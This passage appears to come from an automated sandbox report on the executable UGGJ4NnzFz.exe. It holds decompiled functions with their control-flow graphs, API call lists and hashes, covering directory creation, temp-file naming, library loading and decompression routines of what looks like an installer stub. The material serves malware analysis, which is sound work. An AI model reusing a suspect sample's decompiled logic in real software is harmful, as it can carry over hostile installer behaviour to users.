				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                                                                                0x00401f51
                                                                                                                0x00401f51
                                                                                                                0x00401f56
                                                                                                                0x00401f5d
                                                                                                                0x00402019
                                                                                                                0x00402164
                                                                                                                0x00402164
                                                                                                                0x0040288b
                                                                                                                0x0040288e
                                                                                                                0x0040289a
                                                                                                                0x0040289a
                                                                                                                0x00401f6c
                                                                                                                0x00401f76
                                                                                                                0x00401f79
                                                                                                                0x00401f88
                                                                                                                0x00401f8c
                                                                                                                0x00401f92
                                                                                                                0x00401f96
                                                                                                                0x00402012
                                                                                                                0x00000000
                                                                                                                0x00402012
                                                                                                                0x00401f98
                                                                                                                0x00401fa2
                                                                                                                0x00401fa6
                                                                                                                0x00401fea
                                                                                                                0x00401fa8
                                                                                                                0x00401fab
                                                                                                                0x00401fae
                                                                                                                0x00401fde
                                                                                                                0x00401fb0
                                                                                                                0x00401fb3
                                                                                                                0x00401fbc
                                                                                                                0x00401fbe
                                                                                                                0x00401fbe
                                                                                                                0x00401fbc
                                                                                                                0x00401fae
                                                                                                                0x00401ff2
                                                                                                                0x00402007
                                                                                                                0x00402007
                                                                                                                0x00000000
                                                                                                                0x00401ff2
                                                                                                                0x00401f7c
                                                                                                                0x00401f82
                                                                                                                0x00401f86
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000,?), ref: 00404F3D
                                                                                                                  • Part of subcall function 00404F04: lstrlenA.KERNEL32(00402C4A,0041FC78,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C4A,00000000), ref: 00404F4D
                                                                                                                  • Part of subcall function 00404F04: lstrcatA.KERNEL32(0041FC78,00402C4A,00402C4A,0041FC78,00000000,00000000,00000000), ref: 00404F60
                                                                                                                  • Part of subcall function 00404F04: SetWindowTextA.USER32(0041FC78,0041FC78), ref: 00404F72
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F98
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FB2
                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                                • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                • String ID: ?B
                                                                                                                • API String ID: 2987980305-117478770
                                                                                                                • Opcode ID: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                                • Instruction ID: 83c29b7dad20212888764ed045f323035a642c1bbb84e8da84d377f5f563bf0e
                                                                                                                • Opcode Fuzzy Hash: 8a5e19ada2a0501c23d939e05fc9a3d0d7d0ee5640c0e41b76e5c8575941fe9f
                                                                                                                • Instruction Fuzzy Hash: D621EE72D04216EBCF207FA4DE49A6E75B06B44399F204237F511B52E0D77C4D41965E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 705 4015b3-4015c6 call 4029f6 call 4056ed 710 4015c8-4015e3 call 405684 CreateDirectoryA 705->710 711 40160a-40160d 705->711 720 401600-401608 710->720 721 4015e5-4015f0 GetLastError 710->721 712 40162d-402169 call 401423 711->712 713 40160f-401628 call 401423 call 405b66 SetCurrentDirectoryA 711->713 727 40288b-40289a 712->727 713->727 720->710 720->711 724 4015f2-4015fb GetFileAttributesA 721->724 725 4015fd 721->725 724->720 724->725 725->720
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029F6(0xfffffff0);
				_t10 = E004056ED(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E00405684(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405B66("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                                                                                                                0x004015b3
                                                                                                                0x004015ba
                                                                                                                0x004015bd
                                                                                                                0x004015c2
                                                                                                                0x004015c6
                                                                                                                0x004015c8
                                                                                                                0x004015d0
                                                                                                                0x004015d6
                                                                                                                0x004015d8
                                                                                                                0x004015db
                                                                                                                0x004015e3
                                                                                                                0x004015f0
                                                                                                                0x004015fd
                                                                                                                0x004015fd
                                                                                                                0x004015f2
                                                                                                                0x004015f3
                                                                                                                0x004015fb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004015fb
                                                                                                                0x004015f0
                                                                                                                0x00401600
                                                                                                                0x00401603
                                                                                                                0x00401605
                                                                                                                0x00401606
                                                                                                                0x004015c8
                                                                                                                0x0040160d
                                                                                                                0x0040162d
                                                                                                                0x00402164
                                                                                                                0x0040160f
                                                                                                                0x00401611
                                                                                                                0x0040161c
                                                                                                                0x00401622
                                                                                                                0x00401622
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                  • Part of subcall function 004056ED: CharNextA.USER32(0040549F,?,004218A8,00000000,00405751,004218A8,004218A8,?,?,74B5F560,0040549F,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,74B5F560), ref: 004056FB
                                                                                                                  • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 00405700
                                                                                                                  • Part of subcall function 004056ED: CharNextA.USER32(00000000), ref: 0040570F
                                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                • API String ID: 3751793516-501415292
                                                                                                                • Opcode ID: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                                • Instruction ID: c38907cd9fbddcdb820990ab727de55d75fa8bca08f123d111df4852c942a759
                                                                                                                • Opcode Fuzzy Hash: 79158bb1b9e0f9446a8291b1140989ad94052719e68ebd3d846b01836d69eb3e
                                                                                                                • Instruction Fuzzy Hash: 7E010431D08141AFDB216F751D4497F27B0AA56369728073FF891B22E2C63C0942962E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040586C, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 730 40586c-405876 731 405877-4058a1 GetTickCount GetTempFileNameA 730->731 732 4058b0-4058b2 731->732 733 4058a3-4058a5 731->733 735 4058aa-4058ad 732->735 733->731 734 4058a7 733->734 734->735
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040586C(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}








                                                                                                                0x00405870
                                                                                                                0x00405876
                                                                                                                0x00405877
                                                                                                                0x00405877
                                                                                                                0x00405878
                                                                                                                0x0040587f
                                                                                                                0x00405889
                                                                                                                0x00405896
                                                                                                                0x00405899
                                                                                                                0x004058a1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00000000
                                                                                                                0x004058a7
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 0040587F
                                                                                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 00405899
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                • String ID: "C:\Users\user\Desktop\UGGJ4NnzFz.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                • API String ID: 1716503409-2242918664
                                                                                                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                • Instruction ID: 7bdb262dbebad2fb51735791196b4a750b565e3ebaa120aaaad2cbe3184e43fd
                                                                                                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                • Instruction Fuzzy Hash: B1F0A73734820876E7105E55DC04B9B7F9DDF91760F14C027FE44DA1C0D6B49954C7A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 737516DB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 736 737516db-73751717 call 73751a98 740 73751834-73751836 736->740 741 7375171d-73751721 736->741 742 73751723-73751729 call 737522af 741->742 743 7375172a-73751737 call 737522f1 741->743 742->743 748 73751767-7375176e 743->748 749 73751739-7375173e 743->749 750 73751770-7375178c call 737524d8 call 73751559 call 73751266 GlobalFree 748->750 751 7375178e-73751792 748->751 752 73751740-73751741 749->752 753 73751759-7375175c 749->753 776 737517e3-737517e7 750->776 754 73751794-737517da call 7375156b call 737524d8 751->754 755 737517dc-737517e2 call 737524d8 751->755 758 73751743-73751744 752->758 759 73751749-7375174a call 73752a38 752->759 753->748 756 7375175e-7375175f call 73752cc3 753->756 754->776 755->776 769 73751764 756->769 764 73751746-73751747 758->764 765 73751751-73751757 call 737526b2 758->765 772 7375174f 759->772 764->748 764->759 775 73751766 765->775 769->775 772->769 775->748 779 73751824-7375182b 776->779 780 737517e9-737517f7 call 7375249e 776->780 779->740 782 7375182d-7375182e GlobalFree 779->782 786 7375180f-73751816 780->786 787 737517f9-737517fc 780->787 782->740 786->779 788 73751818-73751823 call 737514e2 786->788 787->786 789 737517fe-73751806 787->789 788->779 789->786 791 73751808-73751809 FreeLibrary 789->791 791->786
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E737516DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x7375405c = _a8;
				 *0x73754060 = _a16;
				 *0x73754064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73754038, E73751556);
				_push(1); // executed
				_t37 = E73751A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E737522AF(_t54);
					}
					E737522F1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E737524D8(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E7375156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E737524D8(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E737524D8(_t54);
							_t37 = GlobalFree(E73751266(E73751559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E7375249E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E737514E2( *0x73754058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E73752CC3(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E73752A38(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E737526B2(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                                                                                0x737516db
                                                                                                                0x737516db
                                                                                                                0x737516db
                                                                                                                0x737516e5
                                                                                                                0x737516ed
                                                                                                                0x737516fa
                                                                                                                0x73751708
                                                                                                                0x7375170b
                                                                                                                0x7375170d
                                                                                                                0x73751712
                                                                                                                0x73751717
                                                                                                                0x73751836
                                                                                                                0x73751836
                                                                                                                0x7375171d
                                                                                                                0x73751721
                                                                                                                0x73751724
                                                                                                                0x73751729
                                                                                                                0x7375172b
                                                                                                                0x73751731
                                                                                                                0x73751737
                                                                                                                0x73751767
                                                                                                                0x7375176e
                                                                                                                0x73751792
                                                                                                                0x737517dd
                                                                                                                0x73751794
                                                                                                                0x73751794
                                                                                                                0x73751795
                                                                                                                0x7375179b
                                                                                                                0x7375179c
                                                                                                                0x737517a6
                                                                                                                0x737517a9
                                                                                                                0x737517ae
                                                                                                                0x737517b5
                                                                                                                0x737517b5
                                                                                                                0x737517bc
                                                                                                                0x737517c2
                                                                                                                0x737517c8
                                                                                                                0x737517d5
                                                                                                                0x737517d6
                                                                                                                0x737517d9
                                                                                                                0x73751770
                                                                                                                0x73751771
                                                                                                                0x73751786
                                                                                                                0x73751786
                                                                                                                0x737517e7
                                                                                                                0x737517ea
                                                                                                                0x737517f7
                                                                                                                0x737517fe
                                                                                                                0x73751806
                                                                                                                0x73751809
                                                                                                                0x73751809
                                                                                                                0x73751806
                                                                                                                0x73751816
                                                                                                                0x7375181e
                                                                                                                0x73751823
                                                                                                                0x73751816
                                                                                                                0x7375182b
                                                                                                                0x00000000
                                                                                                                0x7375182d
                                                                                                                0x00000000
                                                                                                                0x7375182e
                                                                                                                0x7375182b
                                                                                                                0x7375173b
                                                                                                                0x7375173e
                                                                                                                0x7375175c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375175f
                                                                                                                0x73751764
                                                                                                                0x73751764
                                                                                                                0x73751766
                                                                                                                0x00000000
                                                                                                                0x73751766
                                                                                                                0x73751740
                                                                                                                0x73751741
                                                                                                                0x73751749
                                                                                                                0x7375174a
                                                                                                                0x00000000
                                                                                                                0x7375174a
                                                                                                                0x73751743
                                                                                                                0x73751744
                                                                                                                0x73751752
                                                                                                                0x00000000
                                                                                                                0x73751752
                                                                                                                0x73751747
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751747

                                                                                                                APIs
                                                                                                                  • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D09
                                                                                                                  • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D0E
                                                                                                                  • Part of subcall function 73751A98: GlobalFree.KERNEL32 ref: 73751D13
                                                                                                                • GlobalFree.KERNEL32 ref: 73751786
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 73751809
                                                                                                                • GlobalFree.KERNEL32 ref: 7375182E
                                                                                                                  • Part of subcall function 737522AF: GlobalAlloc.KERNEL32(00000040,?), ref: 737522E0
                                                                                                                  • Part of subcall function 737526B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,73751757,00000000), ref: 73752782
                                                                                                                  • Part of subcall function 7375156B: wsprintfA.USER32 ref: 73751599
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 3962662361-3916222277
                                                                                                                • Opcode ID: 5d23d4b4bf5e5eeaf10b80309c931337f940b531b1f5a576d8108379fb7ffa5a
                                                                                                                • Instruction ID: 3e40639a074fc50ca78414ceded735e55ff0921bf2a9bc04de6c83572cd1c58e
                                                                                                                • Opcode Fuzzy Hash: 5d23d4b4bf5e5eeaf10b80309c931337f940b531b1f5a576d8108379fb7ffa5a
                                                                                                                • Instruction Fuzzy Hash: 5641737250034D9BDF0DAF688EC8B9537ECBF04226F188469F94B9B1C6DB789545CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403208, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00403208(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\hardz\\AppData\\Local\\Temp\\";
				E00405DC8(_t6);
				_t2 = E004056C6(_t6);
				if(_t2 != 0) {
					E00405659(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040586C("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                                                                                                                0x00403209
                                                                                                                0x0040320f
                                                                                                                0x00403215
                                                                                                                0x0040321c
                                                                                                                0x00403221
                                                                                                                0x00403229
                                                                                                                0x00403235
                                                                                                                0x0040323b
                                                                                                                0x0040321f
                                                                                                                0x0040321f
                                                                                                                0x0040321f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                  • Part of subcall function 00405DC8: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                  • Part of subcall function 00405DC8: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\UGGJ4NnzFz.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00403229
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 4115351271-1075807775
                                                                                                                • Opcode ID: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                                • Instruction ID: 28437e5e833f6c5712a3d87292ca06883de7807d6adf700678bf42288e0e849f
                                                                                                                • Opcode Fuzzy Hash: 6efbcda31fdcc81e1bc9b7455ac61b895c89039b7b6caaf7bbff9198608db7ec
                                                                                                                • Instruction Fuzzy Hash: 11D0C922656E3032C651363A3C0AFDF091C8F5271AF55847BF908B40D64B6C5A5259EF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406566, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 887 406566-40656c 888 406571-40658f 887->888 889 40656e-406570 887->889 890 406862-40686f 888->890 891 40679d-4067b2 888->891 889->888 892 406899-40689d 890->892 893 4067b4-4067ca 891->893 894 4067cc-4067e2 891->894 896 4068fd-406910 892->896 897 40689f-4068c0 892->897 895 4067e5-4067ec 893->895 894->895 898 406813 895->898 899 4067ee-4067f2 895->899 900 406819-40681f 896->900 901 4068c2-4068d7 897->901 902 4068d9-4068ec 897->902 898->900 904 4069a1-4069ab 899->904 905 4067f8-406810 899->905 907 405fc4 900->907 908 4069cc 900->908 903 4068ef-4068f6 901->903 902->903 910 406896 903->910 911 4068f8 903->911 909 4069b7-4069ca 904->909 905->898 912 406070-406074 907->912 913 4060e0-4060e4 907->913 914 405fcb-405fcf 907->914 915 40610b-40612c 907->915 916 4069cf-4069d3 908->916 909->916 910->892 919 40687b-406893 911->919 920 4069ad 911->920 923 406920-40692a 912->923 924 40607a-406093 912->924 921 4060ea-4060fe 913->921 922 40692f-406939 913->922 914->909 918 405fd5-405fe2 914->918 915->891 918->908 925 405fe8-40602e 918->925 919->910 920->909 926 406101-406109 921->926 922->909 923->909 927 406096-40609a 924->927 929 406030-406034 925->929 930 406056-406058 925->930 926->913 926->915 927->912 928 40609c-4060a2 927->928 931 4060a4-4060ab 928->931 932 4060cc-4060de 928->932 933 406036-406039 GlobalFree 929->933 934 40603f-40604d GlobalAlloc 929->934 935 406066-40606e 930->935 936 40605a-406064 930->936 937 4060b6-4060c6 GlobalAlloc 931->937 938 4060ad-4060b0 GlobalFree 931->938 932->926 933->934 934->908 939 406053 934->939 935->927 936->935 936->936 937->908 937->932 938->937 939->930
                                                                                                                C-Code - Quality: 99%
                                                                                                                			E00406566() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
